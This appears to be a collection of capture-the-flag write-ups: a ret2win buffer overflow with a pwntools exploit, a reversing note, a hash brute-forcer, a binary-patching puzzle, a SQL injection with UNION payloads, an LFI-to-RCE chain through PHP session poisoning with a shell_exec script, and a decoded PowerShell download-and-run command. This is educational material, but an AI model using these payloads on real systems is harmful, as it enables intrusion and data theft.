```$ file santa; checksec santa santa: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=2879273bfbd6a37bf2fb59b81093e32888d50e5c, not stripped[*] '/home/kali/Documents/TFC CTF/santa' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)```
Let's try to run it
```$ ./santa What are you wishing for?
chicken nugget
```
It seems that the program doesn't do anything. Let's open the program using ida to see what the source code looks like.
#### main function```cint __cdecl main(int argc, const char **argv, const char **envp){ __int64 v4; // [rsp+0h] [rbp-30h] __int64 v5; // [rsp+8h] [rbp-28h] __int64 v6; // [rsp+10h] [rbp-20h] __int64 v7; // [rsp+18h] [rbp-18h] __int64 v8; // [rsp+20h] [rbp-10h]
setvbuf(_bss_start, 0LL, 2, 0LL); puts("What are you wishing for?\n"); v4 = 0LL; v5 = 0LL; v6 = 0LL; v7 = 0LL; v8 = 0LL; __isoc99_scanf("%s", &v4;; return 0;}```
From the source code, there is another function that caught my eyes. It's a `flag` function. Let's take a look.
#### flag```cint flag(){ return system("cat flag");}```
From the main function, it seems that we need to overflow the input and jump into the `flag` function.
First, we could use gdb to create a pattern.```$ gdb -q ./santaReading symbols from ./santa...(No debugging symbols found in ./santa)gdb-peda$ pattern create 64'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'```
Next, run the program and send the pattern.```gdb-peda$ rStarting program: /home/kali/Documents/TFC CTF/santa What are you wishing for?
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH
Program received signal SIGSEGV, Segmentation fault.```
From the output above, we can determine which part of our pattern is hitting the return in the main function by examining the `$rsp`.```gdb-peda$ x/gx $rsp0x7fffffffdf68: 0x4841413241416341gdb-peda$ pattern offset 0x48414132414163415206514328315978561 found at offset: 56```
Nice, we got the offset/padding. Now we need to know the address of `flag` function.```gdb-peda$ info funcAll defined functions:
Non-debugging symbols:0x0000000000401000 _init0x0000000000401030 puts@plt0x0000000000401040 system@plt0x0000000000401050 setvbuf@plt0x0000000000401060 __isoc99_scanf@plt0x0000000000401070 _start0x00000000004010a0 _dl_relocate_static_pie0x00000000004010b0 deregister_tm_clones0x00000000004010e0 register_tm_clones0x0000000000401120 __do_global_dtors_aux0x0000000000401150 frame_dummy0x0000000000401152 flag0x0000000000401165 main0x00000000004011e0 __libc_csu_init0x0000000000401240 __libc_csu_fini0x0000000000401244 _fini```
Lastly, we need to get the return address. So when we overwrite the stack, we could change the instruction to return to flag function. To get the return address, we could use ROPgadget.```$ ROPgadget --binary santa | grep "ret"0x0000000000401099 : add ah, dh ; nop dword ptr [rax + rax] ; ret0x00000000004010cb : add bh, bh ; loopne 0x401135 ; nop ; ret0x00000000004011d8 : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret0x00000000004011d9 : add byte ptr [rax], al ; add cl, cl ; ret0x0000000000401098 : add byte ptr [rax], al ; hlt ; nop dword ptr [rax + rax] ; ret0x00000000004011da : add byte ptr [rax], al ; leave ; ret0x000000000040109e : add byte ptr [rax], al ; ret0x000000000040109d : add byte ptr [rax], r8b ; ret0x0000000000401137 : add byte ptr [rcx], al ; pop rbp ; ret0x00000000004011db : add cl, cl ; ret0x00000000004010ca : add dil, dil ; loopne 0x401135 ; nop ; ret0x0000000000401138 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret0x0000000000401013 : add esp, 8 ; ret0x0000000000401012 : add rsp, 8 ; ret0x0000000000401224 : fmul qword ptr [rax - 0x7d] ; ret0x000000000040109a : hlt ; nop dword ptr [rax + rax] ; ret0x00000000004011dc : leave ; ret0x00000000004010cd : loopne 0x401135 ; nop ; ret0x0000000000401132 : mov byte ptr [rip + 0x2f17], 1 ; pop rbp ; ret0x00000000004011d7 : mov eax, 0 ; leave ; ret0x0000000000401162 : nop ; pop rbp ; ret0x00000000004010cf : nop ; ret0x000000000040109b : nop dword ptr [rax + rax] ; ret0x000000000040123d : nop dword ptr [rax] ; ret0x0000000000401234 : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret0x0000000000401236 : pop r13 ; pop r14 ; pop r15 ; ret0x0000000000401238 : pop r14 ; pop r15 ; ret0x000000000040123a : pop r15 ; ret0x0000000000401233 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret0x0000000000401237 : pop rbp ; pop r14 ; pop r15 ; ret0x0000000000401139 : pop rbp ; ret0x000000000040123b : pop rdi ; ret0x0000000000401239 : pop rsi ; pop r15 ; ret0x0000000000401235 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret0x0000000000401016 : ret0x0000000000401062 : retf 0x2f0x000000000040100d : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret0x0000000000401245 : sub esp, 8 ; add rsp, 8 ; ret0x0000000000401244 : sub rsp, 8 ; add rsp, 8 ; ret
```
From the ROPgadget, we only need the one that holds the information of "ret" and the ret address is `0x0000000000401016`
## Exploit
Let's make a solver using python```pythonfrom pwn import *
offset = 56flag = 0x0000000000401152ret = 0x0000000000401016
payload = b""payload += b"A"*offsetpayload += p64(ret)payload += p64(flag)
s = process("./santa")
print(s.recvline().decode())s.sendline(payload)print(s.recvall().decode())
s.close()```
Now we need to do is just run the program to make sure it works!
Since it works, lets test on remote server by adding host, port and replacing `s = process("./santa")` to `s = remote(host, port)````pythonfrom pwn import *
offset = 56flag = 0x0000000000401152ret = 0x0000000000401016
payload = b""payload += b"A"*offsetpayload += p64(ret)payload += p64(flag)
host = "34.65.54.58"port = 1340
s = remote(host, port)
print(s.recvline().decode())s.sendline(payload)print(s.recvall().decode())
s.close()```
Now all we need to do is just run the program!
Flag: `TFCCTF{A11_I_w4nt_4_Chr15tm4s_i5_y0uuuu}` |
- Realize it's cLEMENCy- Use Trail of Bits cLEMENCy tooling- Find the main code- Realize it's modified RC4 (KSA same as expected with MOD = 0x200)
```pythonMOD = 0x200def rc4modified_decrypt(S, inp): out = [] v18 = 0 v36 = 0 for i in range(len(inp)): v18 = (v18 + S[i]) % MOD S[v18], S[i] = S[i], S[v18] K = S[(S[i] + S[v18]) % MOD] out.append((((inp[i]-v36)% MOD) ^ K)) # remove v36 then decode like normal rc4 v36 = inp[i] # next v36 key is last encrypted char return out```
- Dump the key and the result values it compares against- Decrypt compare values with the key- => flag |
# Hashbrowns.py
```pyimport hashlibimport sys
alf = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for a in alf: for b in alf: for c in alf: for d in alf:
password2hash = f'{a}{b}{c}{d}'.encode() hashresult = hashlib.md5(password2hash).digest() sha1 = hashlib.sha1(hashresult) sha224 = hashlib.sha224(sha1.digest()) for i in range(0, 10): sha1 = hashlib.sha1(sha224.digest()) sha224 = hashlib.sha224(sha1.digest()) output = sha224.hexdigest() if output == '9ee2275f8699c3146b65fabc390d83df5657a96c39ab58933f82d39b': print('Passwd: ', f'{a}{b}{c}{d}') sys.exit()```
# FLAG
**`idek{WDOb}`** |
## Retrosynthesis (idekCTF 2021 :D)
#### TLDRDisassembling the binary will show that each of the "reagents" is tied to a function, which performs a specific mathematical operation with certain numbers as specified in the functions. The "reaction" proceeds as the starting material (also a number) undergoes these operations depending on whether the functions are activated. In order to synthesize the "final product", cubane (in this case, also a number), the correct operations have to be activated. This can be done by patching the binary (e.g. using radare2). The functions that have to be activated to generate the final product are: NBS, Diels-Alder, SOCl2, Favorskii.
#### IntroductionWhen we run the binary, we get:```./retrosynthesis ____ __ __ __ _ / __ \___ / /__________ _______ ______ / /_/ /_ ___ _____(_)____ / /_/ / _ \/ __/ ___/ __ \/ ___/ / / / __ \/ __/ __ \/ _ \/ ___/ / ___/ / _, _/ __/ /_/ / / /_/ (__ ) /_/ / / / / /_/ / / / __(__ ) (__ ) /_/ |_|\___/\__/_/ \____/____/\__, /_/ /_/\__/_/ /_/\___/____/_/____/ /____/ -------------------------------------------------------------------------Note: You do not need to know Chemistry to do this challenge, though it will help :)---------------------------------STATUS----------------------------------Math: 28550354772583778 [Not done] | Chem: Benzene [Not added]Math: 5456462 [Not done] | Chem: NBS [Not added]Math: 495739824484 [Not done] | Chem: Diels-Alder Reaction [Not done]Math: 216564715347 [Not done] | Chem: SOCl2 [Not added]Math: 310568239917 [Not done] | Chem: Decarboxylation [Not done]Math: 465725320289 [Not done] | Chem: Aldol Reaction [Not done]Math: 87492136360x0000172e430815590 [Not done] | Chem: Favorskii Reaction [Not done]---------------------------------RESULTS---------------------------------Starting material: 8749110455712246664Desired product: 111524754650467 CubaneObtained product: 8749110455712246664-------------------------------------------------------------------------You did not synthesize the final product! Synthesis failed. :(-------------------------------------------------------------------------```
Oh no! Our synthesis failed! But there does not seem to be a way to input steps or reagents into the binary. Let's disassemble it with r2. Taking a look at the functions that we have: ```r2 -d retrosynthesis...[0x7faecf103050]> aaa...[0x7faecf103050]> afl0x55cb85b3d0e0 1 42 entry00x55cb85b40fe0 4 4124 -> 4135 reloc.__libc_start_main0x55cb85b3d110 4 41 -> 34 sym.deregister_tm_clones0x55cb85b3d140 4 57 -> 51 sym.register_tm_clones0x55cb85b3d180 5 57 -> 54 sym.__do_global_dtors_aux0x55cb85b3d0d0 1 6 sym.imp.__cxa_finalize0x55cb85b3d1c0 1 9 entry.init00x55cb85b3d000 3 23 map._home_calsx_Downloads_CTF_idekctf_retrosynthesis_Retrosynthesis_retrosynthesis.r_x0x55cb85b3d66c 1 22 sym.NBS0x55cb85b3dd10 1 1 sym.__libc_csu_fini0x55cb85b3d6ba 1 28 sym.decarb0x55cb85b3dd14 1 9 sym._fini0x55cb85b3d650 1 28 sym.benzene0x55cb85b3d6f2 1 28 sym.favorsky0x55cb85b3d6d6 1 28 sym.aldol0x55cb85b3d69e 1 28 sym.SOCl20x55cb85b3d1c9 10 254 sym.str2md50x55cb85b3dcb0 4 93 sym.__libc_csu_init0x55cb85b3d682 1 28 sym.diels0x55cb85b3d2c7 1 84 sym.compute_md50x55cb85b3d0c0 1 6 sym.imp.MD5_Init0x55cb85b3d080 1 6 sym.imp.strlen0x55cb85b3d0a0 1 6 sym.imp.MD5_Update0x55cb85b3d090 1 6 sym.imp.MD5_Final0x55cb85b3d70e 31 1429 main0x55cb85b3d030 1 6 sym.imp.printf0x55cb85b3d040 1 6 sym.imp.snprintf0x55cb85b3d050 1 6 sym.imp.puts0x55cb85b3d060 1 6 sym.imp.putchar0x55cb85b3d070 1 6 sym.imp.malloc0x55cb85b3c000 3 126 -> 181 loc.imp.__gmon_start__0x55cb85b3d0b0 1 6 sym.imp.sprintf```
Taking a look at the very long main function, we see that there is a huge chunk of variables being defined on top...```asm0x55cb85b3d70e 55 push rbp0x55cb85b3d70f 4889e5 mov rbp, rsp0x55cb85b3d712 4881ec000100. sub rsp, 0x1000x55cb85b3d719 48b8886b62cd. movabs rax, 0x796b159acd626b880x55cb85b3d723 488945f8 mov qword [var_8h], rax0x55cb85b3d727 c745e4000000. mov dword [var_1ch], 00x55cb85b3d72e c745e0000000. mov dword [var_20h], 00x55cb85b3d735 c745dc000000. mov dword [var_24h], 00x55cb85b3d73c c745d8000000. mov dword [var_28h], 00x55cb85b3d743 c745d4000000. mov dword [var_2ch], 00x55cb85b3d74a c745d0000000. mov dword [var_30h], 00x55cb85b3d751 c745cc000000. mov dword [var_34h], 0```...And that there is some sort of function where the value of these variables is compared to 1. If the value of the variable equals to 1, some function will be activated, and the functions seem to be our "reagents" in this synthesis (in this case, the benzene function): ```asm 0x55cb85b3d7df 837de401 cmp dword [var_1ch], 1│ ┌─< 0x55cb85b3d7e3 7521 jne 0x55cb85b3d806│ │ 0x55cb85b3d7e5 488b45f8 mov rax, qword [var_8h]│ │ 0x55cb85b3d7e9 4889c7 mov rdi, rax│ │ 0x55cb85b3d7ec e85ffeffff call sym.benzene│ │ 0x55cb85b3d7f1 488945f8 mov qword [var_8h], rax│ │ 0x55cb85b3d7f5 488d05ec0a00. lea rax, str.Math:_28550354772583778__Done___Chem:_Benzene__Added_ ; 0x55cb85b3e2e8 ; "Math: 28550354772583778 [Done] | Chem: Benzene [Added]"│ │ 0x55cb85b3d7fc 4889c7 mov rdi, rax│ │ 0x55cb85b3d7ff e84cf8ffff call sym.imp.puts ; int puts(const char *s)│ ┌──< 0x55cb85b3d804 eb0f jmp 0x55cb85b3d815│ │└─> 0x55cb85b3d806 488d05130b00. lea rax, str.Math:_28550354772583778__Not_done___Chem:_Benzene__Not_added_ ; 0x55cb85b3e320 ; "Math: 28550354772583778 [Not done] | Chem: Benzene [Not added]" │ │ 0x55cb85b3d80d 4889c7 mov rdi, rax│ │ 0x55cb85b3d810 e83bf8ffff call sym.imp.puts ; int puts(const char *s)│ │ ; CODE XREF from main @ 0x55cb85b3d804│ └──> 0x55cb85b3d815 837de001 cmp dword [var_20h], 1```We also notice that the starting material is ```0x796b159acd626b88 = 8749110455712246664```. We also know that the end product is ```0x656e61627563 = 111524754650467``` (which is actually Cubane :D).
This is where there are two ways to do this challenge (and where the Chemistry comes in!). We can either analyze each of the functions, determine what they do (and the math behind it), or we can figure out (or Google) the synthesis of Cubane and figure out which reagents we need/reactions to perform. Retrosynthesis! :D
#### The Math WayHere we try to figure out the math behind all 7 of the functions: benzene, NBS, Diels-Alder, SOCl2, decarboxylation, Aldol reaction, and Favorskii reaction. (Small note: All the numbers involved in the math operations actually translate to the chemicals/reactions :DD Chemistry is cool!)_Function 1: Benzene_```asm[0x7faecf103050]> pdf @sym.benzene ; CALL XREF from main @ 0x55cb85b3d7ec┌ 28: sym.benzene (int64_t arg1);│ ; var int64_t var_8h @ rbp-0x8│ ; arg int64_t arg1 @ rdi│ 0x55cb85b3d650 55 push rbp│ 0x55cb85b3d651 4889e5 mov rbp, rsp│ 0x55cb85b3d654 48897df8 mov qword [var_8h], rdi ; arg1│ 0x55cb85b3d658 48b862656e7a. movabs rax, 0x656e657a6e6562 ; 'benzene'│ 0x55cb85b3d662 480145f8 add qword [var_8h], rax│ 0x55cb85b3d666 488b45f8 mov rax, qword [var_8h]│ 0x55cb85b3d66a 5d pop rbp└ 0x55cb85b3d66b c3 ret```This one is pretty obvious; var_8h contains our starting material, and we can see that 0x656e657a6e6562 is being added to it. _Function 2: NBS_```asm[0x7faecf103050]> pdf @sym.NBS ; CALL XREF from main @ 0x55cb85b3d822┌ 22: sym.NBS (int64_t arg1);│ ; var int64_t var_8h @ rbp-0x8│ ; arg int64_t arg1 @ rdi│ 0x55cb85b3d66c 55 push rbp│ 0x55cb85b3d66d 4889e5 mov rbp, rsp│ 0x55cb85b3d670 48897df8 mov qword [var_8h], rdi ; arg1│ 0x55cb85b3d674 488145f84e42. add qword [var_8h], 0x53424e ; [0x53424e:8]=-1│ 0x55cb85b3d67c 488b45f8 mov rax, qword [var_8h]│ 0x55cb85b3d680 5d pop rbp└ 0x55cb85b3d681 c3 ret```0x53424e is being added to the number that we have (starting material + 0x656e657a6e6562 if the benzene function is activated, starting material if the benzene function is not activated). From now on the number would be referred to as the result. _Function 3: Diels-Alder_```asm[0x7faecf103050]> pdf @sym.diels ; CALL XREF from main @ 0x55cb85b3d858┌ 28: sym.diels (int64_t arg1);│ ; var int64_t var_8h @ rbp-0x8│ ; arg int64_t arg1 @ rdi│ 0x55cb85b3d682 55 push rbp│ 0x55cb85b3d683 4889e5 mov rbp, rsp│ 0x55cb85b3d686 48897df8 mov qword [var_8h], rdi ; arg1│ 0x55cb85b3d68a 48b86469656c. movabs rax, 0x736c656964 ; 'diels'│ 0x55cb85b3d694 483145f8 xor qword [var_8h], rax│ 0x55cb85b3d698 488b45f8 mov rax, qword [var_8h]│ 0x55cb85b3d69c 5d pop rbp└ 0x55cb85b3d69d c3 ret```If this function is activated, the result will be XORed with 0x736c656964. _Function 4: SOCl2_```asm[0x7faecf103050]> pdf @sym.SOCl2 ; CALL XREF from main @ 0x55cb85b3d88e┌ 28: sym.SOCl2 (int64_t arg1);│ ; var int64_t var_8h @ rbp-0x8│ ; arg int64_t arg1 @ rdi│ 0x55cb85b3d69e 55 push rbp│ 0x55cb85b3d69f 4889e5 mov rbp, rsp│ 0x55cb85b3d6a2 48897df8 mov qword [var_8h], rdi ; arg1│ 0x55cb85b3d6a6 48b8534f436c. movabs rax, 0x326c434f53 ; 'SOCl2'│ 0x55cb85b3d6b0 480145f8 add qword [var_8h], rax│ 0x55cb85b3d6b4 488b45f8 mov rax, qword [var_8h]│ 0x55cb85b3d6b8 5d pop rbp└ 0x55cb85b3d6b9 c3 ret```If this function is activated, 0x326c434f53 will be added to the result. _Function 5: Decarboxylation_```asm[0x7faecf103050]> pdf @sym.decarb ; CALL XREF from main @ 0x55cb85b3d8c4┌ 28: sym.decarb (int64_t arg1);│ ; var int64_t var_8h @ rbp-0x8│ ; arg int64_t arg1 @ rdi│ 0x55cb85b3d6ba 55 push rbp│ 0x55cb85b3d6bb 4889e5 mov rbp, rsp│ 0x55cb85b3d6be 48897df8 mov qword [var_8h], rdi ; arg1│ 0x55cb85b3d6c2 48b8d3bcb0b0. movabs rax, 0xffffffb7b0b0bcd3│ 0x55cb85b3d6cc 480145f8 add qword [var_8h], rax│ 0x55cb85b3d6d0 488b45f8 mov rax, qword [var_8h]│ 0x55cb85b3d6d4 5d pop rbp└ 0x55cb85b3d6d5 c3 ret```If this function is activated, 0xffffffb7b0b0bcd3 would be added to the result, which is the same as 310568239917 being subtracted from the result. _Function 6: Aldol reaction_Personally my favourite reaction in Organic Chemistry! :D```asm[0x7faecf103050]> pdf @sym.aldol ; CALL XREF from main @ 0x55cb85b3d8fa┌ 28: sym.aldol (int64_t arg1);│ ; var int64_t var_8h @ rbp-0x8│ ; arg int64_t arg1 @ rdi│ 0x55cb85b3d6d6 55 push rbp│ 0x55cb85b3d6d7 4889e5 mov rbp, rsp│ 0x55cb85b3d6da 48897df8 mov qword [var_8h], rdi ; arg1│ 0x55cb85b3d6de 48b8616c646f. movabs rax, 0x6c6f646c61 ; 'aldol'│ 0x55cb85b3d6e8 480145f8 add qword [var_8h], rax│ 0x55cb85b3d6ec 488b45f8 mov rax, qword [var_8h]│ 0x55cb85b3d6f0 5d pop rbp└ 0x55cb85b3d6f1 c3 ret```If this function is activated, 0x6c6f646c61 would be added to the result. _Function 7: Favorskii reaction_```asm[0x7faecf103050]> pdf @sym.favorsky ; CALL XREF from main @ 0x55cb85b3d930┌ 28: sym.favorsky (int64_t arg1);│ ; var int64_t var_8h @ rbp-0x8│ ; arg int64_t arg1 @ rdi│ 0x55cb85b3d6f2 55 push rbp│ 0x55cb85b3d6f3 4889e5 mov rbp, rsp│ 0x55cb85b3d6f6 48897df8 mov qword [var_8h], rdi ; arg1│ 0x55cb85b3d6fa 48b86661766f. movabs rax, 0x796b73726f766166 ; 'favorsky'│ 0x55cb85b3d704 483145f8 xor qword [var_8h], rax│ 0x55cb85b3d708 488b45f8 mov rax, qword [var_8h]│ 0x55cb85b3d70c 5d pop rbp└ 0x55cb85b3d70d c3 ret```If this function is activated, the result would be XORed with 0x796b73726f766166.
Knowing how these functions work, you can do a little bit of math and figure out how to get 111524754650467 (Cubane).
#### The Chem Way :DThis method is much, much easier than the Math one. All you need to do is to Google the synthesis of Cubane (can be found at https://www.synarchive.com/syn/14 -- SynArchive is basically Exploit-DB for Chemists). 
Simply by looking at the synthesis, we can figure out that NBS, Diels-Alder reaction, SOCl2 and Favorskii reaction are needed to make Cubane.
#### Patching the binaryWe can patch the binary to switch on the required functions using the almighty radare2. We can open the binary in write mode: ``` r2 -w retrosynthesis```From looking at the functions, we know that the variables that we have to change to 1 are var_20h, var_24h, var_28h and var_34h. We can do so as such: ```[0x000010e0]> wx c745e0010000 @0x0000172e[0x000010e0]> wx c745dc010000 @0x00001735[0x000010e0]> wx c745d8010000 @0x0000173c[0x000010e0]> wx c745cc010000 @0x00001751```Printing the main function again: ```asm0x00001719 48b8886b62cd. movabs rax, 0x796b159acd626b880x00001723 488945f8 mov qword [var_8h], rax0x00001727 c745e4000000. mov dword [var_1ch], 00x0000172e c745e0010000. mov dword [var_20h], 10x00001735 c745dc010000. mov dword [var_24h], 10x0000173c c745d8010000. mov dword [var_28h], 10x00001743 c745d4000000. mov dword [var_2ch], 00x0000174a c745d0000000. mov dword [var_30h], 00x00001751 c745cc010000. mov dword [var_34h], 1```We can see that now the required functions are now activated! Running the binary, we get: ```./retrosynthesis ____ __ __ __ _ / __ \___ / /__________ _______ ______ / /_/ /_ ___ _____(_)____ / /_/ / _ \/ __/ ___/ __ \/ ___/ / / / __ \/ __/ __ \/ _ \/ ___/ / ___/ / _, _/ __/ /_/ / / /_/ (__ ) /_/ / / / / /_/ / / / __(__ ) (__ ) /_/ |_|\___/\__/_/ \____/____/\__, /_/ /_/\__/_/ /_/\___/____/_/____/ /____/ -------------------------------------------------------------------------Note: You do not need to know Chemistry to do this challenge, though it will help :)---------------------------------STATUS----------------------------------Math: 28550354772583778 [Not done] | Chem: Benzene [Not added]Math: 5456462 [Done] | Chem: NBS [Added]Math: 495739824484 [Done] | Chem: Diels-Alder Reaction [Done]Math: 216564715347 [Done] | Chem: SOCl2 [Added]Math: 310568239917 [Not done] | Chem: Decarboxylation [Not done]Math: 465725320289 [Not done] | Chem: Aldol Reaction [Not done]Math: 8749213636430815590 [Done] | Chem: Favorskii Reaction [Done]---------------------------------RESULTS---------------------------------Starting material: 8749110455712246664Desired product: 111524754650467 CubaneObtained product: 111524754650467-------------------------------------------------------------------------You synthesized cubane! :Didek{y0U_90tt4_ke3p_tr13NE_h47d3r}
.: / ) ( ( \ ) o ._(/_. o |___%| ___ ___ ___ ___ ___ | %| | | ._____|_|__|_|__|_|__|_|_____. | %| | | |__________________________|%| | %| |o| | | |%| | | | | |~| | | .|_%|. .' '. | | |%| | | |~| |#| | | | ()%| / o \ | | :%: :~: : : :#: | | .__|___%|__. :____o__: ._|_|_. ._|_|_. | ___%|_ '._____.' |___|%| |___|%| |_____(____ ) ( ( \ '._____.- '._______.-
-------------------------------------------------------------------------```
The flag is idek{y0U_90tt4_ke3p_tr13NE_h47d3r} :D |
# Yummy Vegetables
This Challenges was based on a simple SQL injection.
First we looked at the interaction of the web page and see directly that there is a query made over a customhttp Query. We can simulate such a query with this curl script:```bashcurl http://host.cg21.metaproblems.com:4010/search -X SEARCH --header "Content-Type: application/json" --data '{"query":"test"}'```
With the given sourcecode of the index.js:```jsconst express = require('express');const Ajv = require('ajv');const sqlite = require('better-sqlite3');const sleep = (ms) => new Promise((res) => { setTimeout(res, ms) })// set up expressconst app = express();app.use(express.json());app.use(express.static('public'));// ajv request validatorconst ajv = new Ajv();const schema = { type: 'object', properties: { query: { type: 'string' }, }, required: ['query'], additionalProperties: false};const validate = ajv.compile(schema);// databaseconst db = sqlite('db.sqlite3');// search routeapp.search('/search', async (req, res) => { if (!validate(req.body)) { return res.json({ success: false, msg: 'Invalid search query', results: [], }); } await sleep(5000); // the database is slow :p const query = `SELECT * FROM veggies WHERE name LIKE '%${req.body.query}%';`; let results; try { results = db.prepare(query).all(); } catch { return res.json({ success: false, msg: 'Something went wrong :(', results: [], }) } return res.json({ success: true, msg: `${results.length} result(s)`, results, });});// start serverapp.listen(3000, () => { console.log('Server started');});```
We can also verify the SQLi vector at the line:```jsconst query = `SELECT * FROM veggies WHERE name LIKE '%${req.body.query}%';`;```
With this given SQL injection we can now check the column count:```sql%' order by 5; --%' order by 4; --%' order by 3; --```So we know that we got 3 columns so lets create a test:
```%' AND 1=0 UNION SELECT 1,name,3 FROM sqlite_master; --```
And we get a list of tables in the database. We can assume that our table `the_flag_is_in_here_730387f4b640c398a3d769a39f9cf9b5`holds our flag, so we tried to get the column flag of that table.
```sql%' and 1=0 UNION SELECT 1,flag,2 FROM the_flag_is_in_here_730387f4b640c398a3d769a39f9cf9b5; --```
And we got the flag:
```MetaCTF{sql1t3_m4st3r_0r_just_gu3ss_g0d??}``` |
# Custom Blog
We got greeted with this challenge server http://host.cg21.metaproblems.com:4130/which shows multiple blog entries which seems to be loaded as a file over include or require.
To test this we tried to include a familiar file from the host with path traversal.
```http://host.cg21.metaproblems.com:4130/post.php?post=../etc/passwdhttp://host.cg21.metaproblems.com:4130/post.php?post=../../etc/passwdhttp://host.cg21.metaproblems.com:4130/post.php?post=../../../etc/passwdhttp://host.cg21.metaproblems.com:4130/post.php?post=../../../../etc/passwd```And we found the content of the /etc/passwd file
```root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinflag:x:999:999::/home/flag:/usr/sbin/nologin```
That was quite easy, so we assumed that we can easily execute php code with the common practices.
So we tried:```http://host.cg21.metaproblems.com:4130/post.php?post=../../../../proc/self/environ```
Which did not return anything, so we tried log poisoning but where unable to find or read anny meaningful log which we could influence.We also knew that we could not abuse the wrapper due the prepending of the `posts/` in the post syntax. (Known from the source)
```php
<html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <link rel="stylesheet" href="/style.css"> </head> <body> ' . htmlentities($_GET['post']) . '</h1><hr><div class="post">'; include $post; echo '</div>'; } else { echo '<h1>post not found :(</h1><hr>'; } ?> home </body></html>```
So we were pretty stuck until we noticed that there is a session available in which we can add data.So we injected some php code in the `theme` session variable. That could be done over:```http://host.cg21.metaproblems.com:4130/set.php?theme=```
This session variable is saved in the user session, per default the php session handler is file based,so we tried to locate the directory where they are located.Its achievable because we know the schema which the file is created: `/xxx/xxx/sess_{SESSIONID}` the session id can be taken from the php session used from the client which fired the above request.and the xxx directories need to be found.We found our directory under /tmp/ so we went further to create a small exploit script which could run arbitary code:
```pyimport base64
import requests
def stage_one(): se = requests.session() se.get( "http://host.cg21.metaproblems.com:4130/set.php?theme=") return se
def stage_two(s, cmd): sessionid = s.cookies.get("PHPSESSID") res = s.post( "http://host.cg21.metaproblems.com:4130/post.php?post=../../../../tmp/sess_" + sessionid, data={"code": "print(shell_exec(base64_decode('" + str(base64.b64encode(cmd.encode("utf-8")), "utf-8") + "')));"}) print(res.content.decode()) pass
s = stage_one()stage_two(s, "ls -all")```
Now where we can execute commands we can run any commands. We found setuid binary called /flag/flagreader by uploading linpeas to the server.
So we could just run
```pystage_two(s, "/flag/flagreader")```
And got the flag```MetaCTF{wh4t??lfi_1s_ev0lv1ng??}``` |
RSA encryption oracle with buggy RSA exponent sort of challenge.
Full writeup: [https://ctf.rip/write-ups/crypto/nitectf-rabin/](https://ctf.rip/write-ups/crypto/nitectf-rabin/) |
You can find offset in Ghidra RAX=>local_58,[RBP + -0x50] -> 0x50 = 80 in decimal + 8 bytes which is the distance between RBP and return address.
python2 -c 'print "\x90"*88 + "\x16\x12\x40\x00\x00\x00\x00\x00"' | nc bof.chal.idek.team 1337 |
# MetaCTF 2021## My Logs Know What You Did (125pts)### Description: >While investigating an incident, you identify a suspicious powershell command that was run on a compromised system ... can you figure out what it was doing?`C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -sta -w 1 -enc TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn`
### Step 1 - Understanding the Command:In this Powershell command, we can see it runs a command but it appears to be encoded. The `-enc` flag encodes the payload in Base64, so we can throw it into a Base64 decoder and extact some data.
### Step 2 - Decode Base64
By using just the encoded payload portion as our input, we can now read the unencoded payload and determine what it's doing.
If it was a real sample, this command would download a executable file from a staging site and start the process on the victim machine.
<details> <summary> Flag Spoiler </summary> MetaCTF{super_sus_st4ging_site_d0t_c0m}</details>
## Learning TakeawaysWe learned about Powershell encoding functionality, and even further we learned that obfuscation can be achieved in the command flags like `-noP` because Powershell handles parameter binding in a way that essentially auto-completes the intended flag. More can be found [here](https://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier). |
# SECRET
Challenge author: tomadimitrie
Can you tell me a secret?
## Analysis
In this challenge we were given an ELF-64bit named `secret` with no canary, NX enabled, and PIE is also enabled.
